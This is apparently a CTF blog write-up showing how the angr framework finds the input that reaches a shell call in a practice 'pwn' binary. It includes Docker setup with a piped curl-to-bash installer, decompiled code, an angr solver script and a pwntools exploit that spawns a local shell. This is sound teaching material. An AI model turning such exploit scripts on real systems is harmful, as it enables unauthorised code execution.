zer0_1s


Endless exploration

auto pwn

I recently saw an example of automated binary vulnerability mining for auto pwn presented by Master i0gan from D0g3 Lab, and I wanted to see what it is all about.

1. angr python framework

What is angr?
angr is a python framework for analyzing binaries. It combines both static and dynamic symbolic ("concolic") analysis, making it applicable to a variety of tasks.

It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.

"Concolic" is a combination of the words "concrete" and "symbolic". Concolic testing is a hybrid software verification technique that uses both symbolic execution (treating program variables as symbolic variables) and concrete execution (involving concrete inputs).

2. angr environment deployment

install docker

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

docker pull

docker pull angr/angr
./setup.sh -i -e angr

# how to use angr in docker
docker run -itd --name angr angr/angr
docker exec -it angr bash
su angr # root users do not have the angr environment, so switch to the angr user

#!/bin/sh
# Author: i0gan
# for starting docker angr: runs a script from the current directory inside the angr container
if [ $# -lt 1 ]; then
    echo "Usage: angr script.py [arg1] [arg2]"
    exit 1
fi
script=$1
# ctf_name is never set in the original; assumed to be the challenge sub-directory, defaulting to "."
ctf_name=${ctf_name:-.}
docker run -it \
    -u angr \
    --rm \
    -v "$(pwd)/${ctf_name}:/ctf/work" \
    -w /ctf/work angr/angr "/home/angr/.virtualenvs/angr/bin/python" "/ctf/work/$script" $2 $3

# start a pwndocker container with the same work directory mounted, for running the exploit and debugging
docker run -it \
    --rm \
    -v "$(pwd)/${ctf_name}:/ctf/work" \
    -p 23946:23946 \
    --privileged \
    --cap-add=SYS_PTRACE \
    --security-opt seccomp=unconfined \
    pwndocker

3. Introduction to angr

Learning angr (Part 1)

4. Automated Mining Example for PWN Questions

AUTO PWN|34th Issue

Thanks to Master D0g3 from Chengxin for quickly providing the corresponding challenge.

root@DESKTOP-4VN4G0C:/Desktop/pwn# checksec pwn1
[*] '/Desktop/pwn/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

Next, analyze the corresponding logic of the disassembled code in IDA:


int sub_804870E()
{
  int result; // eax
  char v1; // [esp+Ch] [ebp-1Ch]
  int v2; // [esp+1Ch] [ebp-Ch]

  result = atoi(&input); // atoi("\n") is 0, so an empty line selects case 0; cases 1 and 2 are the other branches
  v2 = result;
  switch ( result )
  {
    case 1:
      puts("logging out...");
      result = ~dword_804A06C;
      dword_804A06C = ~dword_804A06C;
      break;
    case 2:
      if ( dword_804A06C )
        result = sub_80486F5(); // spawns a shell
      else
        result = puts("please log in");
      break;
    case 0:
      puts("input your passwd:");
      result = sub_804859B((int)&v1, 16); // reads the password, but it is never compared against anything, so its expected length cannot be known
      dword_804A06C = 1; // the key variable for spawning the shell; set to 1 regardless of what password was entered
      break;
  }
  return result;
}

Master D0g3's method is to use the angr framework to search for an input that reaches the shell function: it is enough for execution to reach the instruction highlighted in red (the call at 0x08048783).


target_addr = 0x08048783

import angr
from binascii import b2a_hex
import logging
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')  # silence angr's own logging

def angr_main():
    pj = angr.Project('./pwn1')
    state = pj.factory.entry_state()            # start symbolic execution at the ELF entry point
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x08048783)            # stop once a path reaches the call to the shell function
    p = simgr.found[0].posix.dumps(0)           # concretise the stdin that drives that path
    print(b2a_hex(p).decode(), end='')          # hex-encoded so it can be pasted into the exploit script
angr_main()

root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/pwn1 1e40bd134aa7:/home
root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/script.py 1e40bd134aa7:/home

from pwn import *
from binascii import a2b_hex

io = process('./pwn1')
print('Solving...')
payload = a2b_hex('310a320a')  # the stdin angr found: b'1\n2\n' -> "logging out" flips the flag to ~0, then option 2 spawns the shell
io.send(payload)
print('Get shell')
io.sendline(b'whoami')
io.interactive()


import angr
from binascii import b2a_hex
import logging
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./find_flag')
    target = 0x1229                             # address of the shell call as shown by IDA
    if pj.loader.main_object.pic:               # PIE binary: IDA shows an offset from 0, angr maps the ELF at its own base
        target += pj.loader.main_object.min_addr
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = target)                # call shell
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

This article is a test for the xLog platform. Although I will no longer focus on CTF binary direction in the future, I may still pay attention to interesting topics or issues in this field.
